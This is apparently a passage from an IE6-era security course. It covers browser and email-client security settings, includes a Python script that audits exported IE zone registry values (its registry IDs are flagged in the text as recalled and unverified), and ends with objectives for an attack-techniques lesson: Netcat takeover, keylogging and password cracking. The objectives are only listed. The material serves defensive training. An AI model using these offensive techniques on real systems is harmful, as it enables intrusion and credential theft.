If you visit http://browsers.evolt.org, you will be presented with an array of browsers, many of which are in use today, including Arachne, Cello, Chimera, Grail, HotJava, IBrowse, Internet Explorer, InterGo, Internet Workhorse, I-View, Lotus Notes, Lynx, Mosaic, NeoPlanet, NetCruiser, Netscape, Mozilla, Opera, Quarterdeck, Spyglass, Sesame, Tango, Teleport Pro, Voyager, WebExplorer, and WebTV, among others. There are text-based browsers, there are voice-based browsers, and there are colorful and fun browsers that you can customize to change their look and feel. But the two most debated browsers are still Internet Explorer and Netscape. The consensus is that the browser wars are over, and Netscape lost, at least for the present time. Of course, it's still a good product, so if you're keeping tabs, you wouldn't just write it off. Consider this: At the time of this writing, Netscape had launched version 7.0 for Windows, Macintosh, and Linux machines, and Netscape's browser engine, Gecko, was going to be integrated into parent company AOL's customized browser, in effect putting Netscape on the desktops of over 20 million users.

The concept of a Web browser/Web server combination was thought of, experimented upon, and crystallized by Tim Berners-Lee while he worked at CERN in Switzerland. He literally invented the Web. Of course, someone else claims to have invented the Internet. Those who would like to learn more about Berners-Lee's groundbreaking work should read his book, Weaving the Web.

Meanwhile, Internet Explorer 6 (IE6) has been marching ahead, hot fixes, service packs, and all, and taking over market share from earlier versions. Between these new versions of Internet Explorer and Netscape, you get more features, so you have more configurable options, which therefore translates to more headaches for network administrators.

The security setting on your browser should match your need for security or privacy, and there's no cookie cutter approach to this.

somewhere on www.dslreports.com.

General Settings for Internet Explorer 6

Let's look at some of the configurable options in Internet Explorer version 6, all the while concentrating on those issues that relate to its security. You will first verify what version of IE you're running. You will then proceed to go through the steps required to configure its security settings. The following tasks are a bit different from the other tasks in the course, in that you are basically doing a walk-through of the various settings in IE so that you can better understand the implications of changing these settings. You will not actually configure any of these settings. You would, by understanding their implications, use this knowledge and perhaps use a Group Policy or the Internet Explorer Administration Kit (IEAK) to configure robust security settings for your enterprise.

TASK 7D-2
Viewing the General Settings for Your Browser

Setup: You are logged on to Windows 2000 as the renamed Administrator account.

1. Start Internet Explorer.
2. Choose Help→About Internet Explorer.
3. Verify that your version is 6.x, and click OK. If it is not, upgrade Internet Explorer to version 6.x, so that you can follow the rest of the steps in the following set of tasks. At the time of this writing, Microsoft had released Service Pack 1 (for IE6).

4. Right-click the Internet Explorer icon on your desktop and choose Properties. You should see the following dialog box, or one very similar to it.
Differences that you might notice include the name of the dialog box itself, and the Home Page address.
5. Observe that there are seven tabs: General, Security, Privacy, Content, Connections, Programs, and Advanced. There are security issues related to many of these tabs, and you will step through them one at a time.
6. Examine the General tab.
7. Examine the Home Page area. Here, you can set your default home page. You should keep an eye out for this, as many malicious programs attempt to set your home page to some naughty site or the other. Even some legitimate programs like to set their Web site as your home page. You can manually type in your preferred home page in the address box provided, you can click Use Current to set the home page to the page you are currently viewing, you can click Use Default to set the home page to Microsoft.com, or you can simply click Use Blank to bring up a blank page when you launch IE.
8. Examine the Temporary Internet Files area. This area enables you to specify the location of the folder where your Temporary Internet Files and cookies are stored.
9. Click Settings. First, you can specify how often IE checks for updates to locally cached content. You can leave it set to Automatically for now.
10. Below this, observe the current location of the Temporary Internet Files folder. By default, it is part of your user profile.
You can configure your Temporary Internet Files folder to be a RAM drive. This way, files will not be written to a physical disk.
You can use the slider to minimize the amount of disk space to use to 1 MB, or slide the scale to allow for more space. More space means more caching, and therefore a faster browsing experience, but not everyone is comfortable with leaving a lot of cached content lying around on their hard drives. You can also change the location of this folder by clicking Move Folder. If you do change this location, you must restart your computer for the changes to take effect.
11. Click View Files to see a list of files (Web pages, graphics, and cookies) that are stored in this folder. Close the Explorer window to return to the Internet Options and Settings dialog boxes.
12. Click View Objects to see a list of ActiveX and Java controls that have been downloaded to your computer. These files are stored in the %systemroot%\Downloaded Program Files folder. Close the Explorer window to return to the Internet Options and Settings dialog boxes.
13. Click Cancel to return to the General tab.
14. Examine the History area. This area specifies how long the History folder keeps pages in history. Where is this folder? It can be found as a subfolder in your user profile, normally \Documents and Settings\username\Local Settings\History.

We are done with security issues in the General tab.

Advanced Settings for Internet Explorer 6

You will now look at the settings associated with the Advanced tab. Many important security settings are to be found here. The settings here are broadly divided, vertically, into Accessibility, Browsing, HTTP 1.1, Multimedia, Printing, Search, and Security. The vast majority of the settings on this tab are check boxes, meaning that they are Yes/No settings. The few settings that are not have radio-button options, so they are Either/Or settings.

TASK 7D-3
Viewing the Advanced Settings for Your Browser

Setup: The Internet Properties dialog box is displayed.

1. Click the Advanced tab.
2. Scroll all the way down this list and back up again. Observe that there are many settings here.
3. Right-click any setting, and choose What's This? to see an explanation for that setting. Many settings, such as Disable Script Debugging and Display A Notification About Every Script Error, are useful for developers who are testing Web sites. Some settings have security implications, even though they're in sections other than the Security section.
4. In the Browsing section, observe the Enable Install On Demand settings. This setting specifies that Internet Explorer or a Web page can automatically download components if a Web page needs them, in order to display the page properly or to perform a particular task. If you are running a highly secure environment, you will probably want to turn this off.
5. Observe the Enable Third-party Browser Extensions setting. This setting allows for the use of features created by companies other than Microsoft. It does not allow you to control specific features. This is generally used as a troubleshooting tool, but it can be turned off if you do not want to trust any third-party created extensions.
6. Scroll down to the Security section. There are over a dozen settings here that directly affect the security of your browser.
7. Observe the Check For Publisher's Certificate Revocation setting. This setting allows you to verify the validity of software by checking to see if the software publisher's certificate has been revoked or not. This box should be checked.
8. Observe the Check For Server Certificate Revocation setting. This setting is similar to the previous one, except that we're dealing with the validity of a Web site's certificate. This box should also be checked.
9. Observe the Check For Signatures On Downloaded Programs setting. This setting indicates that a program's identity will be verified by using Microsoft's Authenticode technology. This box should be checked.
10. Observe the Do Not Save Encrypted Pages To Disk setting. Information exchanged with a secure Web site is cached locally. This is encrypted information; however, for the sake of security, you do not want to have this box checked.
11. Observe the Empty Temporary Internet Files Folder When Browser Is Closed setting. Of course, you do want to have this box checked.
12. Observe the Enable Integrated Windows Authentication setting. This setting allows you to choose whether or not you want to negotiate authentication or use Kerberos. Earlier versions of IE (5, 5.01, and 5.5) enabled Kerberos by default. Here, you're given the choice, so that you can set this according to your specific requirements.
13. Observe the Enable Profile Assistant setting. This setting specifies whether you will accept a Web site's request for Profile Assistant information. Profile Assistant is set up and configured on the Content tab by clicking My Profile.
The profiles listed by Profile Assistant are shared with Outlook Express.
14. Observe the Use SSL 2.0 and Use SSL 3.0 settings. The choice here is simply whether you want to use the more secure SSL 3.0, or allow the use of SSL 2.0 as well. This setting depends entirely on the requirements of the enterprise.
15. Observe the Use TLS 1.0 setting. Again, the decision to allow Transport Layer Security (another open security standard) depends on the requirements of the enterprise.
16. Observe the Warn About Invalid Site Certificates setting. This setting must be checked, as it will warn the user whether the URL associated with a Web site's certificate is valid or not.
17. Observe the Warn If Changing Between Secure And Not Secure Mode setting. This setting warns the user if the browser is moving from a secure site (https://) to a nonsecure site (http://). It's worth keeping this checked.
18. Observe the Warn If Forms Submittal Is Being Redirected setting. This setting, if checked, warns you when you submit information at a site, but the information you submit is actually being sent to some other site. It is useful to keep this checked, as well.

Security Settings for Internet Explorer 6

The Security tab is where you will be able to use the built-in division of all networks into Local and Internet, or Trusted and Restricted zones. Each of these zones has its own broad outline of what the security level should be. If you visit a site that you have included in your Trusted zone, then this is considered a low security risk. If you are visiting some site on the Internet that you don't know much about, then this site could be considered a medium security risk, and so on. The Internet zone is a very generic zone, but with the Intranet, Trusted, and Restricted zones, you can be more explicit with respect to specifying what sites are included there. You can specify sites via their domain names or even by their specific IP addresses.

TASK 7D-4
Viewing the Zone Settings for Your Browser

Setup: The Internet Properties dialog box is displayed.

1. Click the Security tab. Observe that there are four content zones listed in the box at the top: Internet, Local Intranet, Trusted Sites, and Restricted Sites.
2. Examine the Security Level For This Zone area. You can set the security level for each of the four zones listed. These Security Levels can be set to the default four levels represented by the sliding scale (High, Medium, Medium-Low, and Low), or you could select Custom Level, and then go about applying specific security settings. A typical combination might be as shown in the following table:

Zone            Security Level
Internet        Medium
Local Intranet  Medium-Low
Trusted         Low
Restricted      High

Default Security Settings for Internet Explorer

What do these default levels (High, Medium, Medium-Low, and Low) mean? Let's start from the lowest level and work our way to the highest level.

Low: This means that minimal safeguards and warning prompts are provided, most content is downloaded and run without prompts, and all active content can run. This security level is therefore appropriate for sites that you specifically trust.

Medium-Low: This means that most content will be run without prompts, but unsigned ActiveX controls will not be downloaded. This security level is therefore appropriate for internal networks, such as your intranet.

Medium: This level provides a level of security similar to Medium-Low, but with additional safeguards. This security level is therefore appropriate for the Internet.

High: This level represents the safest setting for the browser, but can also become very difficult to use, as most of the functionality of the browser has been disabled, so many sites will not be represented well or not at all. This security level is therefore appropriate for sites that might have harmful content.

You could also infer that when looked at in this order, each level is a subset of the next.

So what are the inner workings for each of these security levels anyway? Let's set the four zones to their typical default levels and work from there.

TASK 7D-5
Implementing Default Security Levels for Zones

Setup: The Internet Properties dialog box is displayed, with the Security tab active.

1. If necessary, select the Internet zone.
2. Click the Default Level button.
3. If necessary, specify this security level to be Medium by moving the slider to the appropriate level.
4. Click Apply.
5. If necessary, select the Local Intranet zone.
6. Set this level to Medium-Low.
7. If necessary, select the Trusted Sites zone.
8. Set this level to Low.
9. If necessary, select the Restricted Sites zone.
10. Set this level to High.
11. Select each zone, and verify that the slider shows the appropriate security level for each one.

The Low Security Setting

Now that you have set default security levels for the four zones, you will examine their settings. You will begin with examining the settings for Low. Note: To understand the implications of all these settings, some knowledge about Web site design is required. For instance, if you are unfamiliar with terms such as META REFRESH (which is used to redirect to another page) and IFRAME (which is used to created an inline frame for the inclusion of external objects), you might want to review Web sites such as www.htmlhelp.com and www.pageresource.com. Of course, when you are dealing with anything to do with Internet Explorer, you can also go straight to Microsofts Web site. It is a repository of information.

TASK 7D-6
Viewing Detailed Settings for the Security Level Low

Setup: The Internet Properties dialog box is displayed, with the Security tab active.

1. Select the Trusted Sites zone. The slider should be on Low.
2. Click the Custom Level button.
3. In the Settings dialog box, observe the long list of browser behavior settings. These are divided vertically into areas named: ActiveX Controls And Plug-ins, Downloads, Microsoft VM, Miscellaneous, Scripting, and User Authentication.
4. Under ActiveX Controls And Plug-ins, verify the settings. They should be set to:
Download Signed ActiveX Controls: Enable
Download Unsigned ActiveX Controls: Prompt
Initialize And Script ActiveX Controls Not Marked As Safe: Prompt
Run ActiveX Controls And Plug-ins: Enable
Script ActiveX Controls Marked Safe For Scripting: Enable
5. Under Downloads, verify the settings. They should be set to:
File Download: Enable
Font Download: Enable
6. Under Microsoft VM, verify the setting. It should be set to:
Java Permissions: Low Safety
7. Under Miscellaneous, verify the settings. They should be set to:
Access Data Sources Across Domains: Enable
Allow META REFRESH: Enable
Display Mixed Content: Prompt
Don't Prompt For Client Certificate Selection When No Certificates Or Only One Certificate Exists: Enable
Drag And Drop Or Copy And Paste Files: Enable
Installation Of Desktop Items: Enable
Launching Programs And Files In An IFRAME: Enable
Navigate Sub-frames Across Different Domains: Enable
Software Channel Permissions: Low Safety
Submit Nonencrypted Form Data: Enable
Userdata Persistence: Enable
8. Under Scripting, verify the settings. They should be set to:
Active Scripting: Enable
Allow Paste Operations Via Script: Enable
Scripting Of Java Applets: Enable
9. Under User Authentication, verify the setting. It should be set to:
Logon: Automatic Logon With Current Username And Password
10. Click Cancel to return to the Security tab.

The High Security Setting

Now that you have seen what the settings are for Low, you will compare these with the settings for High. As with the previous task, where you examined the details for the Low security setting, to understand the implications of all of these settings, some knowledge about Web site design is required.

TASK 7D-7
Viewing Detailed Settings for the Security Level High

Setup: The Internet Properties dialog box is displayed, with the Security tab active.

1. Select the Restricted Sites zone. The slider should be on High.
2. Click the Custom Level button. The same categories are displayed as in the previous task.
3. Under ActiveX Controls And Plug-ins, verify the settings. They should be set to:
Download Signed ActiveX Controls: Disable
Download Unsigned ActiveX Controls: Disable
Initialize And Script ActiveX Controls Not Marked As Safe: Disable
Run ActiveX Controls And Plug-ins: Disable
Script ActiveX Controls Marked Safe For Scripting: Disable
4. Under Downloads, verify the settings. They should be set to:
File Download: Disable
Font Download: Prompt
5. Under Microsoft VM, verify the setting. It should be set to:
Java Permissions: Disable Java
6. Under Miscellaneous, verify the settings. They should be set to:
Access Data Sources Across Domains: Disable
Allow META REFRESH: Disable
Display Mixed Content: Prompt
Don't Prompt For Client Certificate Selection When No Certificates Or Only One Certificate Exists: Disable
Drag And Drop Or Copy And Paste Files: Prompt
Installation Of Desktop Items: Disable
Launching Programs And Files In An IFRAME: Disable
Navigate Sub-frames Across Different Domains: Disable
Software Channel Permissions: High Safety
Submit Nonencrypted Form Data: Prompt
Userdata Persistence: Disable
7. Under Scripting, verify the settings. They should be set to:
Active Scripting: Disable
Allow Paste Operations Via Script: Disable
Scripting Of Java Applets: Disable
8. Under User Authentication, verify the setting. It should be set to:
Logon: Prompt For Username And Password
9. Click Cancel to return to the Security tab.
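Tasks 7D-6 and 7D-7 have you verify each setting by clicking through the Custom Level dialog on one machine. The same per-zone settings are stored as DWORD values under HKCU\Software\Microsoft\Windows\CurrentVersion\Internet Settings\Zones\<n> (1 = Local Intranet, 2 = Trusted Sites, 3 = Internet, 4 = Restricted Sites), so the check can be scripted against a regedit export (File > Export) and repeated across many workstations. The Python script below is an added example, not part of the course and not a Microsoft tool: it parses a .reg export of one zone key and reports every setting that deviates from the High baseline listed in Task 7D-7. The registry action IDs (1001, 1004, and so on) and the value encodings are assumptions taken from Microsoft's documentation of the Zones key as recalled here and should be verified against the IE version in use; the sample export is constructed.

```python
r"""Audit an exported Internet Explorer zone key against the High baseline.

Added example, not part of the course: the settings verified by hand in Tasks 7D-6
and 7D-7 are stored as DWORDs under
HKCU\Software\Microsoft\Windows\CurrentVersion\Internet Settings\Zones\<n>,
so a regedit export of that key can be checked offline on many workstations.
"""
import re

# Assumed mapping of registry action IDs to the names shown in Custom Level
# (from Microsoft's documentation of the Zones key, as recalled; verify against
# the IE version in use before relying on it).
ACTION_NAMES = {
    "1001": "Download Signed ActiveX Controls",
    "1004": "Download Unsigned ActiveX Controls",
    "1200": "Run ActiveX Controls And Plug-ins",
    "1201": "Initialize And Script ActiveX Controls Not Marked As Safe",
    "1405": "Script ActiveX Controls Marked Safe For Scripting",
    "1803": "File Download",
    "1400": "Active Scripting",
    "1407": "Allow Paste Operations Via Script",
    "1601": "Submit Nonencrypted Form Data",
    "1A00": "Logon",
}
ACTION_VALUES = {0: "Enable", 1: "Prompt", 3: "Disable"}
LOGON_VALUES = {0x00000: "Automatic Logon With Current Username And Password",
                0x10000: "Prompt For Username And Password",
                0x20000: "Automatic Logon Only In Intranet Zone",
                0x30000: "Anonymous Logon"}
LEVEL_NAMES = {0x10000: "Low", 0x10500: "Medium-Low", 0x11000: "Medium", 0x12000: "High"}

# The High baseline from Task 7D-7, restricted to the IDs mapped above.
HIGH_BASELINE = {
    "Download Signed ActiveX Controls": "Disable",
    "Download Unsigned ActiveX Controls": "Disable",
    "Run ActiveX Controls And Plug-ins": "Disable",
    "Initialize And Script ActiveX Controls Not Marked As Safe": "Disable",
    "Script ActiveX Controls Marked Safe For Scripting": "Disable",
    "File Download": "Disable",
    "Active Scripting": "Disable",
    "Allow Paste Operations Via Script": "Disable",
    "Submit Nonencrypted Form Data": "Prompt",
    "Logon": "Prompt For Username And Password",
}

_KEY_RE = re.compile(r"^\[.*\\Zones\\(\d)\]$")
_DWORD_RE = re.compile(r'^"([0-9A-Fa-f]{4}|CurrentLevel)"=dword:([0-9A-Fa-f]{8})$')


def parse_zone_export(reg_text):
    """Return (zone_number, {value_name: int}) from a .reg export of one zone key."""
    zone, values = None, {}
    for line in reg_text.splitlines():
        line = line.strip()
        key = _KEY_RE.match(line)
        if key:
            zone = int(key.group(1))
            continue
        dword = _DWORD_RE.match(line)
        if dword and zone is not None:
            name = dword.group(1)
            values[name if name == "CurrentLevel" else name.upper()] = int(dword.group(2), 16)
    return zone, values


def describe(action_id, raw):
    """Translate a raw DWORD into the text the Custom Level dialog would show."""
    table = LOGON_VALUES if action_id == "1A00" else ACTION_VALUES
    return table.get(raw, hex(raw))


def audit_zone(values, baseline):
    """List (setting, expected, actual) for each baseline setting that is missing or differs."""
    deviations = []
    for action_id, name in ACTION_NAMES.items():
        if name not in baseline:
            continue
        actual = describe(action_id, values[action_id]) if action_id in values else "missing"
        if actual != baseline[name]:
            deviations.append((name, baseline[name], actual))
    return deviations


# Constructed sample export of the Restricted Sites zone (zone 4), not from a real
# machine: the slider value still says High, but Active Scripting has been re-enabled.
SAMPLE_EXPORT = r"""Windows Registry Editor Version 5.00

[HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Internet Settings\Zones\4]
"DisplayName"="Restricted sites"
"CurrentLevel"=dword:00012000
"1001"=dword:00000003
"1004"=dword:00000003
"1200"=dword:00000003
"1201"=dword:00000003
"1405"=dword:00000003
"1803"=dword:00000003
"1400"=dword:00000000
"1407"=dword:00000003
"1601"=dword:00000001
"1A00"=dword:00010000
"""

if __name__ == "__main__":
    zone, values = parse_zone_export(SAMPLE_EXPORT)
    print(f"Zone {zone}, slider level: {LEVEL_NAMES.get(values.get('CurrentLevel'), 'custom')}")
    for name, expected, actual in audit_zone(values, HIGH_BASELINE):
        print(f"  DEVIATION {name}: expected {expected}, found {actual}")
```

Run it against exports collected from several workstations. A zone whose slider still reads High while an individual value has drifted, as in the constructed sample where Active Scripting was turned back on, is exactly the condition that clicking through the Custom Level dialog in Task 7D-7 is meant to catch, and it is much easier to catch in bulk this way.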

The Microsoft Virtual Machine

So, the differences between Low and High are quite obvious. While Low enables most settings and prompts for a few, High disables most settings and prompts for a few. Medium-Low and Medium lie somewhere in between. One of the settings has to do with Microsoft VM. What is Microsoft VM? It stands for Microsoft Virtual Machine and is basically a module that Microsoft introduced for implementing Java code on Windows machines. You may have noticed that one of the settings for Microsoft VM Java Permissions, apart from Low, Medium, High, or Disable, is Custom. What can you do with the Custom setting?

TASK 7D-8
Viewing the Custom Settings for Microsoft VM (Java Settings)

Setup: The Internet Properties dialog box is displayed, with the Security tab active.

1. Select the Internet zone.
2. Click the Custom Level button.
3. Scroll down to Microsoft VM.
4. For Java Permissions, click Custom.
5. Observe the Java Custom Settings button towards the bottom of the dialog box.
6. Click Java Custom Settings. A dialog box with two tabs, View Permissions and Edit Permissions, is displayed.
7. Examine the View Permissions tab. Many security settings, broadly dealing with Permissions Given To Unsigned Content, Permissions That Signed Content Are Allowed, and Permissions That Signed Content Are Denied, are listed.
8. Select the Edit Permissions tab.
9. Observe that you can change these permissions.
10. Right-click anywhere in this box, and observe the Permissions Help pop-up that is displayed.
11. In the Permissions Help window, click User Directed File I/O, and read the explanation for it.
12. Close the Help window.
13. Click Cancel twice.

How to Make Best Use of These Zones

Earlier, there was a discussion on the four zones: Internet, Intranet, Trusted, and Restricted Sites. The Internet, of course, is a superset of all sites that are not on your intranet. Therefore, when you select the Internet zone, the Sites button is grayed out; however, when you select any of the other three zones, the Sites button is available for use. This enables you to explicitly specify which Web sites you want to include in the zone, and therefore the security level that applies to the specified Web sites.

TASK 7D-9
Adding Sites to a Zone

Setup: The Internet Properties dialog box is displayed, with the Security tab active.

1. Select the Local Intranet zone.
2. Click the Sites button.
3. Observe the check boxes for Include All Local (Intranet) Sites Not Listed In Other Zones, Include All Sites That Bypass The Proxy Server, and Include All Network Paths (UNCs).
4. Click the ? in the upper-right corner of the dialog box. Then click each of these descriptions in turn to find out more about the options.
5. Click the Advanced button.
6. Under Add This Web Site To The Zone, enter http://internalweb.scp to add a Web site.
7. Click Add, then click OK twice.
8. Select the Trusted Sites zone.
9. Click the Sites button.
10. Under Add This Web Site To The Zone, enter https://*.mybank.com to add a Web site.
11. Observe that Require Server Verification (https:) For All Sites In This Zone is checked.
12. Click Add, and then click OK.
13. Add, to the Restricted Sites zone, the Web site http://*.somebadsite.com.

Cookies

Next, you will look at how your Web browser is configured to handle cookies. These come under the purview of privacy settings. To learn more about privacy issues on the Internet, you should visit the Platform for Privacy Preferences Project at www.w3.org/P3P.

TASK 7D-10
Viewing Cookie Handling Settings

Setup: The Internet Properties dialog box is displayed, with the Security tab active.

1. Click the Privacy tab.
2. Observe the slider scale. It enables you to select six levels of cookie handling for the Internet zone, from Accept All Cookies to Block All Cookies.
3. Slide the scale from one extreme to the other, stopping at each of the six levels. Read the descriptions for each setting. For example, the default cookie handling level for the Internet zone is Medium; this level blocks third-party cookies that do not have a compact privacy policy, blocks third-party cookies that use personally identifiable information without your explicit consent, and restricts first-party cookies that use personally identifiable information without implicit consent.
4. Click Advanced, and observe that you can override the default levels and come up with your own settings. Click Cancel.
5. Click the Edit button. This option enables you to override cookie handling for individual Web sites.
6. Enter somebadsite.com, and click Block.
7. Enter mybank.com, and click Allow.
8. Click OK.

Content Ratings

Next, you will look at the Content tab. The Content tab enables you to control three very different sets of options. One has to do with Web site ratings, the onus of implementing this being with the Web host and the responsibility of controlling access to rated sites being with the browser. Another option has to do with certificates. The third option has to do with your Profile Assistant.

profile: Patterns of a user's activity which can detect changes in normal routines.
TASK 7D-11
Viewing Content Ratings

Setup: The Internet Properties dialog box is displayed, with the Privacy tab active.

1. Click the Content tab.
2. Observe that the settings are split into three broad divisions: Content Advisor, Certificates, and Personal Information.
3. Under Content Advisor, click the Enable button to display a page that enables you to specify various levels of settings associated with what someone using this browser is permitted to view in relation to subjects such as language, nudity, sex, and violence (much like movie and TV ratings).
4. Select Language. Then adjust the slider from Level 0 (Inoffensive Slang) through Level 4 (Explicit Or Crude Language).
5. Select Nudity. Then adjust the slider from Level 0 (No Nudity) through Level 4 (Provocative Display Of Frontal Nudity).
6. Select Sex. Then adjust the slider from Level 0 (None) through Level 4 (Explicit Sexual Activity).
7. Select Violence. Then adjust the slider from Level 0 (No Violence) through Level 4 (Wanton And Gratuitous Violence).

Using Content Ratings

These ratings are presently governed by the Internet Content Rating Association (ICRA), an independent organization. For more information, please visit www.icra.org. The whole effort is voluntary on the part of the Web author, who completes an online questionnaire describing the content of the Web site. ICRA generates a content label, which is added to the site by the Web author. When a browser points to this Web site and its settings are equal to or greater than that posted on the Web site, the person is allowed to visit that site.

You can also rate your Web site when hosting it on IIS 5.0.

TASK 7D-12
Configuring a Browser to Use Content Ratings

Setup: The Internet Properties dialog box is displayed, with the Content tab active, and the Content Advisor dialog box displayed.

1. Change the rating levels to anything you like for each of the four options presented.
2. Click the Approved Sites tab. Here, you can enter domain names that are always allowed or never allowed, regardless of the rating.
3. Click OK, and observe that the Create Supervisor Password dialog box is displayed. Here, you can enter a password to lock these settings into place.
4. Enter the password 1234, and confirm it. Enter any hint you want.
5. Click OK. Observe the pop-up informing you that Content Advisor is enabled.
6. Click OK.
7. Now, click Settings. Observe that you are now required to enter a password before you can continue.
8. Click Cancel.
9. Click Disable.
10. Observe that you have to enter the password to disable the Content Rating option.
11. Click Cancel.

Certificates

Next, you will take a brief look at the Certificates section and see how it is used by your browser. This is a very important section related to security, and very detailed discussions and tasks dealing with implementing certificates and certificate authorities in your enterprise are dealt with in the courses that comprise Level 2 of the SCP.

TASK 7D-13
Properties of the Certificates Section

Setup: The Internet Options dialog box is displayed, with the Content tab active.

1. Click the Certificates button to display the Certificates dialog box.
2. Observe that there are four tabs: Personal, Other People, Intermediate CAs, and Trusted Root CAs.
You do not have any personal certificates at this stage, nor do you have certificates from other people at this point. However, click the Intermediate and Trusted Root CAs, and observe the list of certificates that are displayed. These are certificates pre-loaded for you by Microsoft. Basically, this is a list of all the Certificate Authorities trusted by your browser. For example, when you go to perform a transaction on an SSL-enabled Web site, if that Web site was protected by a valid certificate obtained from one of the CAs on your list, you will know. If not, you will know that as well.
3. Click Close.

Your Personal Information

Your browser can maintain information about you personally, if you want it to. Now, you will look at the Personal Information section.

TASK 7D-14
Viewing the Handling of Personal Information by a Browser

Setup: The Internet Properties dialog box is displayed, with the Content tab active.

1. Click the AutoComplete button. Based on the settings here, your browser will keep a record of things you have typed using your browser and will automatically help you out. It is up to you to determine if you want to keep this setting active.
If you wanted to clear the history of AutoComplete, you could also use the Clear Forms and Clear Passwords buttons.
2. Click Cancel.
3. Click the My Profile button. If you have been using your email client, Outlook Express, you might see some entries in the Address Book. If not, you will see a gray box.
4. Observe that the radio button for Create A New Entry In The Address Book To Represent Your Profile is already selected.
5. Click OK.
6. Enter a user name and an email address. You can also specify more information about yourself by using the other tabs.
7. Click OK. You now have a profile that can be used if required. When a Web site requests Profile Assistant information and the corresponding setting is checked, you will be asked if you want to share the profile information stored here.
8. Click OK to close the Internet Properties dialog box.

Email Security

Outlook Express 6 is the email client that comes bundled with Internet Explorer 6. You can configure Outlook Express (OE) to retrieve and send mail via more than one email server. The current version also enables you to have more than one user account (identity) associated with the client. You will now look at some of the security issues surrounding this email client.

TASK 7D-15
Basic Security Settings to Take Care of With Your Email Client

1. Double-click your Outlook Express client.
2. If the Internet Connection Wizard is displayed, click Cancel and then click Yes to close the Wizard.
3. Select the Inbox, and observe that it contains a welcome message from Microsoft. When the message is highlighted, you can see a preview of that message in the pane below. As we discussed earlier, these are good intentions that can get exploited. Your first priority should be to turn off this Preview feature. Choose View→Layout.
4. In the lower half of this dialog box, uncheck Show Preview Pane.
5. Click OK.
6. If you're being spammed and you want to filter this yourself, choose Tools→Message Rules→Blocked Senders List.
7. Click Add. Here, you can specify specific email addresses or domain names that you want to block.
8. Click Cancel twice.
9. Choose Tools→Options.
10. Click the Security tab, and observe the configuration options.
You can specify that OE stay within the Restricted Sites zone.
You can configure OE to warn you if some other application tries to send email as you.
You can configure OE to not allow attachments to be saved or opened that could potentially be a virus (however, most organizations depend on more robust solutions on the mail servers themselves to do such scanning).
You can specify that OE digitally sign and/or encrypt all outgoing messages.
11. Click the Advanced button. You can specify encryption strengths to check for, specify to include your digital ID when sending signed messages, and check for revoked Digital IDs.
12. Click Cancel twice.
13. Choose File→Identities→Add New Identity. Enter a name for the new identity and click OK. When you are prompted to switch to the new identity, click Yes. The Internet Connection Wizard is displayed.
14. Enter any name for yourself, and click Next.
15. Enter any email address for yourself, and click Next.
If you use a hotmail.com account, the steps will be slightly different than listed here.
16. Enter any mail server's address (IP address or domain name), and click Next.
17. Enter any password.
18. Depending on your mail server, you may have to specify SPA. Leave it unchecked here, and click Next.
19. Click Finish.
Note: Perform step 20 through step 22 only if you entered a live mail server address in step 16.
20. Select the mail server, and click Properties.
21. Click the Security tab. You can specify the strength of the encrypting algorithm to use.
22. Click Cancel, and then click Close.
Note: Perform the following step on all computers.
23. Close all open windows.

Summary

In this lesson, we discussed the physical structure of the Internet and its components. You were introduced to terminologies, such as NSPs, NAPs, and ISPs, and technologies, such as DNS, as they relate to the Internet and security. The common attack points of the Internet were described, as were standard methods of Web hacking. You also looked at the Internet user at risk, and the methods that an attacker can use against individual users. Further, you identified browser security options in extreme detail; every single tab and option available was discussed. You also took a brief look at how to secure your email client.

Lesson Review

7A How many Root DNS servers are there on the Internet, and in how many countries are they distributed?
There are 13 Root DNS servers distributed across four countries.

In what three broad areas of activity is ICANN involved?
DNS support, addressing support, and protocol support.

What qualifications are required for a Tier Two ISP?
Tier-Two ISPs obtain their bandwidth from Tier One and have a local or regional backbone network. They have at least 50,000 subscribers and provide service at a state or national level.

7B List a few methods used by malicious attackers for targeting DNS.
DNS cache poisoning, DNS Server compromise, and DNS response spoofing.

What routing protocol is used on Backbone routers?
BGP or Border Gateway Protocol.

What versions of BIND were susceptible to the Lion worm?
Most BIND versions 8.2.x were susceptible to the Lion worm. This was patched from BIND 8.2.3 and above.

7C What does the CVE mean when it uses numbers prefixed with CAN?
Before vulnerabilities are classified with a CVE prefix (during the research phase), they are classified with a CAN (or CANdidate) prefix.

What does HFNetChk from Microsoft help you do?
HFNetChk enables you to quickly record what hot fixes and/or service packs you have running on your Windows NT or 2000 machine.

What template is recommended by Microsoft to secure a machine that is running IIS 5.0?
Microsoft recommends that you apply the hisecweb.inf template.

7D Under which tab in Internet Explorer's Internet Options dialog box would you be able to configure the browser to check for publisher's certificate revocation?
On the Advanced tab, in the Security section.

Describe how you would configure your browser to trust a site.
On the Security tab, select the Trusted Sites zone, click the Sites button, and add the domain name or IP address of the Web site.

You have configured your browser to not accept cookies by default. However, there are certain sites you want to go to that require you to have cookies enabled. Describe how you would configure your browser to allow cookies from such a site.
On the Privacy tab, click the Advanced button. Override the default behavior by specifying Web sites that you want to explicitly accept cookies from.

As an administrator, you need to secure your users' email client software. What is one of the first and easiest settings to take care of?
Disabling the Preview pane.

LESSON 8

Attack Techniques

Overview

In this lesson, you will be introduced to the common techniques used to attack networks and various operating systems. You will follow examples on how to map networks, identify the types of operating systems on the network, and scan for potential holes in those operating systems. You will be introduced to the concepts behind viruses, Trojan Horses, and worms. You will identify the techniques used in password cracking, and you will explore and discuss basic scripting techniques.

Data Files: Malweb folder and contents
Lesson Time: 6 hours

Objectives

To become familiar with attacking techniques, you will:

8A Define the process of network reconnaissance.
Given a network scenario, you will describe how to use network reconnaissance to gather information about a target.

8B Map a network with provided tools.
Given a simple network scenario, you will use tracing tools to map the physical layout of a network.

8C Sweep a network with the provided tools.
Given a simple network scenario, you will use network sweeping tools to identify active hosts in a target network.

8D Scan a network with provided tools.
Given a simple network scenario, you will use network scanning tools to determine which ports are open on target computers.

8E Differentiate between a virus, a worm, and a Trojan Horse.
Given a network scenario, you will define how a virus, worm, or Trojan Horse represents a threat and how they are differentiated from one another.

8F Implement a malicious Web site.
In this topic, you will see how ordinary users can be tricked into downloading or running programs on their computers via the Web.

8G Gain control over a network system.
Given a simple network scenario, you will gain control over a system by using Netcat.

8H Record keystrokes with software and hardware.
Given a simple network scenario, you will use software and hardware recording tools to log the keystrokes entered on a keyboard.

8I Crack encrypted passwords on Linux and Microsoft machines.
Given a simple network scenario, you will use tools to crack encrypted passwords on Linux and Windows computers.

8J Reveal passwords hidden by asterisks.
Given a simple network scenario, you will use password-revealing tools to identify hidden passwords.

